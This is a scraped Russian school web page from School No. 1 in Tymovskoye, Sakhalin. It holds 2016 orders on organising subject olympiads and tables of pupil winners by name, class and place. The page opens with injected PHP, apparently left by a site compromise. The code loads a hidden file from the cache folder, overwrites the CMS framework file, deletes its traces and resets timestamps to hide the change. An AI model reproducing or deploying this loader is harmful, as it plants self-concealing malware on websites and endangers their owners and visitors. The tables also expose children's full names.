$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Олимпиады, конкурсы, проекты
Версия для слабовидящих
Олимпиады, конкурсы, проекты

Акция "Георгиевская ленточка"

 

Экология

 

25 января в школе состоялся школьный этап Международного конкурса «Живая классика»

Победителями стали: Темникова Виктория с произведением С.Писахова «Перепелиха» и Софья Гребнева с произведением Н.Носова «Заплатка».



 

Сахалинская область
Муниципальное бюджетное общеобразовательное учреждение
«Средняя общеобразовательная школа № 1 пгт. Тымовское»

ПРИКАЗ

от 20 сентября 2016 года
№ 419

Об организации и проведении предметных олимпиад среди
обучающихся 4 -11 классов в 2016 – 2017 учебном году.

В соответствии с приказом управления образования МО «Тымовский городской округ» от 12 сентября 2016 года № 211 « Об организации и проведении школьного и муниципального этапа Всероссийской олимпиады школьников образовательных учреждений МО «Тымовский городской округ» в 2016 – 2017 учебном году»,

ПРИКАЗЫВАЮ:

1. Провести школьный этап Всероссийской олимпиады школьников в МБОУ СОШ №1 среди обучающихся 4 – 11 классов с 05 по 25 октября 2016 года
Время проведения с 10.00 до 13.00 часов

  • - русский язык – 04.10.2016 г.;
  • - математика – 05.10.2016 г.;
  • - английский язык – 06.10.2016 г.;
  • - история – 07.10.2016 г.;
  • - география – 11.10.2016 г.;
  • - литература – 12.10.2016 г.;
  • - обществознание – 13.10.2016 г.;
  • - биология – 14.10.2016 г.;
  • - информатика – 18.10.2016 г.;
  • - химия – 19.10.2016 г.;
  • - физика – 20.10.2016 г.;
  • - физическая культура – 21.10.2016 г.;
  • - искусство (МХК) – 25.10.2016 г..

2. Назначить оргкомитет по проведению школьного этапа Всероссийской олимпиады в составе:

  • Старкова О.Д. – заместитель директора по УВР;
  • Свиридова Л.Г. – заместитель директора по ВР;
  • Филянова Н.Е. – учитель химии, биологии

3. Утвердить состав предметных комиссий:


История, обществознание, право Воронова С.В.
Чураева С.Е.
Балдина А.А.
Математика, физика Мордвинова В.Е.
Якусова Е.Н.
Сыченко Л.Б.
Химия, биология, география Филянова Н.Е.
Белихина В.Н.
Рудь О.А.
Русский язык, литература Самохина Е.В.
Ермакова О.Ю.
Егорова О.В.
Английский язык Старкова О.Д.
Артемьева А.Д.
Скоробогатая Л.В.
Информатика Свиридова Л.Г.
Соколова Е.Ю.
Белоусова В.А.
Физическая культура Балыков Д.Н.
Катаев П.В.
Романов С.В.
Искусство (МХК) Кубан Л.С.
Гуйван Т.Н.
Артамонова Т.М.

4. Учителям – предметникам подготовить списки обучающихся, участвующих в школьных олимпиадах, до 01 октября 2016 года и сдать Старковой О.Д..

5. Контроль за исполнением приказа оставляю за собой.


Приказ об организации и проведении школьного и муниципального этапов Всероссийской олимпиады школьников общеобразовательных учреждений в 2016-2017 учебном году

Расписание муниципального этапа олимпиад

Приказ о назначении общественных наблюдателей при проведении муниципального этапа Всероссийской олимпиады школьников 2016-2017 учебного года

Приказ об утверждении порядка проведения всероссийской олимпиады школьников

Приказ о внесении изменений в порядок проведения всероссийской олимпиады школьников, утвержденный приказом Министерства образования и науки Российской Федерации от 18 ноября 2013 г. № 1252

Приказ о внесении изменений в порядок проведения всероссийской олимпиады школьников, утвержденный приказом Министерства образования и науки Российской Федерации от 18 ноября 2013 года № 1252

Об утверждении порядка аккредитации граждан в качестве общественных наблюдателей при проведении государственной итоговой аттестации по образовательным программам основного общего и среднего общего образования, всероссийской олимпиады школьников и олимпиад школьников



ПРИКАЗ

от 27.10.2016 г.
№ 479

Об итогах школьного этапа Всероссийской олимпиады школьников
и поощрении обучающихся 5-11 классов.

По итогам школьного этапа Всероссийской олимпиады школьников,

ПРИКАЗЫВАЮ:

1.Объявить благодарность и вручить дипломы победителям и призерам школьного этапа Всероссийской олимпиады школьников в 2016 – 2017 учебном году:

Победители и призеры олимпиады по химии

Ф.И. Класс Место
1 Кузьмина Анна 8 «А» 2
2 Сергеев Максим 8 «А» 1
3 Важенкова Елизавета 8 «В» 3
4 Червова Александра 9 «А» 3
5 Лосева Екатерина 9 «А» 2
6 Сикорская Екатерина 9 «А» 2
7 Суняйкина Анжелика 11 «А» 2
8 Привалова Ульяна 11 «Б» 2

Победители и призеры по истории

Ф.И. Класс Место
1 Логинова Дарья 5 «А» 1
2 Хамгокова Влада 5 «А» 3
3 Ярошенко Дарья 5 «В» 2
4 Муравьева Алина 6 «А» 2
5 Намаконов Антон 6 «А» 3
6 Егораева Вероника 6 «А» 1
7 Бабиков Владислав 6 «Б» 1
8 Расулов Даниял 6 «Б» 2
9 Сухарев Владимир 6 «Б» 3
10 Барчак Юлия 7 «А» 3
11 Данилов Никита 7 «А» 2
12 Василенко Олег 7 «А» 3
13 Плиева Лариса 7 «А» 3
14 Гараев Владислав 7 «Б» 3
15 Журавлева Дана 7 «Б» 2
16 Клишина Валерия 7 «Б» 1
17 Хан Э-Ри 7 «В» 3
18 Манаева Алёна 7 «В» 1
19 Соловьева Юлия 7 «В» 2
20 Ерусалимский Данил 8 «А» 3
21 Желнин Илья 8 «А» 3
22 Сергеев Максим 8 «А» 2
23 Юрченко Роман 8 «А» 1
24 Князев Максим 8 «Б» 1
25 Кадышев Роман 8 «В» 3
26 Мишенькина Елизавета 8 «В» 1
27 Тарасова Оксана 8 «В» 2
28 Гавриков Максим 9 «А» 3
29 Ким Юлия 9 «А» 2
30 Лосева Екатерина 9 «А» 1
31 Стыцук Елена 10 1
32 Шах Вера 10 2
33 Манько Кристина 11 «Б» 1
34 Маренкова Олеся 11 «Б» 2

Победители и призеры олимпиады по химии

Ф.И. Класс Место
1 Кузьмина Анна 8 «А» 2
2 Сергеев Максим 8 «А» 1
3 Важенкова Елизавета 8 «В» 3
4 Червова Александра 9 «А» 3
5 Лосева Екатерина 9 «А» 2
6 Сикорская Екатерина 9 «А» 2
7 Суняйкина Анжелика 11 «А» 2
8 Привалова Ульяна 11 «Б» 2

Победители и призеры по обществознанию

Ф.И. Класс Место
1 Егораева Вероника 6 «А» 1
2 Муравьева Алина 6 «А» 1
3 Петренко Виктория 6 «А» 2
4 Емельянова Полина 6 «А» 3
5 Шопинская Елена 6 «Б» 3
6 Вайсят Илья 7 «А» 3
7 Барчак Юлия 7 «А» 2
8 Гараев Владислав 7 «Б» 2
9 Журавлёва Дана 7 «Б» 3
10 Цориева Кристина 7 «Б» 2
11 Хохлов Александр 7 «Б» 2
12 Манаева Алёна 7 «В» 1
13 Хан Э - Ри 7 «В» 1
14 Ерусалимский Данил 8 «А» 1
15 Сергеев Максим 8 «А» 2
16 Юрченко Роман 8 «А» 3
17 Дронов Никита 9 «А» 3
18 Лосева Екатерина 9 «А» 1
19 Нефёдова Амина 9 «А» 3
20 Сикорская Екатерина 9 «А» 2
21 Кузнецова Александра 10 3
22 Лихошерстов Владислав 10 2
23 Стыцук Елена 10 1
24 Шах Вера Валерьевна 10 2
25 Манько Кристина 11 «Б» 1
26 Маренкова Олеся 11 «Б» 2

Победители и призеры по английскому языку

Ф.И. Класс Место
1 Шаманаева Арина 5 «В» 1
2 Клычева Вика 5 «В» 2
3 Власюк Рустам 5 «В» 3
4 Ковалев Владислав 3
5 Бережнова Юлия 7 «А» 3
6 Журавлева Дана 7 «Б» 2
7 Субботин Дима 8 «Б» 2
8 Новиков Егор 8 «Б» 3
9 Колосов Саша 9 «А» 3

Победители и призеры по биологии

Ф.И. Класс Место
1 Хорошайлова Эльвира 11 1
2 Суняйкина Анжелика 11 2
3 Кузнецова Александра 10 1
4 Карлова Елизавета 10 3
5 Войчишена Анна 10 2
6 Шамрай Анастасия 6 «А» 2
7 Арсеньев Марк 6 «А» 2
8 Самохина Юлия 6 «А» 3
9 Егораева Вероника 6 «А» 1
10 Крикунов Александр 9 «А» 1
11 Колосов Александр 9 «А» 2
12 Червова Александра 9 «А» 3

Победители и призеры по математике

Ф.И. Класс Место
1 Гараев Владислав 2
2 Темникова Виктория 2
3 Хохлов Александр 2
4 Субботин Дмитрий 2
5 Князев Максим 2
6 Емельянов Максим 2
7 Кряжевских Эрнест 2
8 Миняев Владимир 2
9 Христофоров 1
10 Буянов Валерий 1
11 Лаптева Виктория 2
12 Хамгокова Влада 1
13 Батурова Ксения 1
14 Куданкина Валерия 1
15 Расулов Даниял 1
16 Емельянова 1
17 Норина Алина 1
18 Скородумов Илья 1
19 Куприянов Константин 1
20 Теров Михаил 1
21 Давлетчин Евгений 1
22 Шамрай Анастасия 1
23 Муравьева Алина 1

Победители и призеры олимпиады по русскому языку

Ф.И. Класс Место
1 Коневская Арина 6 «Б» 1
2 Ярошенко Дарья 5 «А» 2
3 Логинова Дарья 5 «А» 3
4 Муравьева Алина 6 «А» 1
5 Самохина Юлия 6 «А» 1
6 Анохин Константин 6 «А» 2
7 Шамрай Анастасия 6 «А» 3
8 Шопинская Елена 6 «Б» 3
9 Гараев Владислав 7 «Б» 1
10 Барчак Юлия 7 «А» 2
11 Темникова Виктория 7 «А» 2
12 Плиева Лариса 7 «А» 3
13 Клишина Валерия 8 «А» 1
14 Нагорная Екатерина 8 «А» 2
15 Желнин Илья 8 «А» 2
16 Тарасова Оксана 8 «В» 3
17 Ким Юлия 9 «А» 1
18 Лосева Екатерина 9 «А» 1
19 Тен Николь 9 «А» 2
20 Стыцук Елена 10 1
21 Анохина Марина 10 1
22 Князев Дмитрий 10 3
23 Чеснокова Юлия 10 4
24 Васильева Алина 11 «Б» 1
25 Манько Кристина 11 «Б» 1
26 Черкасова Александра 11 «Б» 2
27 Вафина Елизавета 11 «Б» 2
28 Бацанова Анастасия 11 «Б» 3

Победители и призеры олимпиады по литературе

Ф.И. Класс Место
1 Коневская Арина 5 «Б» 1
2 Шопинский Данил 5 «Б» 2
3 Белый Иван 5 «Б» 3
4 Егораева Вероника 6 «А» 1
5 Самохина Юлия 6 «А» 2
6 Анохин Константин 6 «А» 3
7 Барчак Юлия 7 «А» 1
8 Темникова Виктория 7 «А» 1
9 Шмакова Юлия 8 «А» 1
10 Нагорная Екатерина 8 «А» 2
11 Желнин Илья 8 «А» 2
12 Тарасова Оксана 8 «В» 2
13 Ким Юлия 9 «А» 1
14 Рухлова Ирина 9 «А» 1
15 Ридель Яна 10 «А» 12
16 Стыцук Елена 10 1
17 Манько Кристина 11 «Б» 1
18 Черкасова Александра 11 «Б» 1

Победители и призеры олимпиады по физике

Ф.И. Класс Место
1 Новиков Егор 8 «Б» 3
2 Князев Максим 8 «Б» 3
3 Важенкова Лиза 8 «В» 3
4 Тарасова Оксана 8 «В» 3
5 Лосева Екатерина 9 «В» 1
6 Ким Юлия 9 «В» 1
7 Васильев Никита 9 «В» 2
8 Чураев Максим 9 «В» 2
9 Диденко Иван 9 «В» 2
10 Капустин Данил 9 «В» 2
11 Прозорова Полина 9 «В» 2
12 Нестерова Лиза 9 «В» 2

Победители и призеры олимпиады по географии

Ф.И. Класс Место
1 Журавлёва Дана 7 «Б» 1
2 Гараев Владислав 7 «Б» 2
3 Кривенко Алина 8 «В» 2
4 Тарасова Оксана 8 «В» 2
5 Мишенькина Елизавета 8 «В» 3
6 Мельник София 8 «В» 1
7 Лосева Екатерина 9 «А» 1
8 Иванов Эрнест 10 1
9 Хорошайлова Эльвира 11 «А» 1

2. Классным руководителям обучающихся довести до сведения родителей итоги школьного этапа олимпиады.

 
<< Первая < Предыдущая 1 2 Следующая > Последняя >>

Страница 1 из 2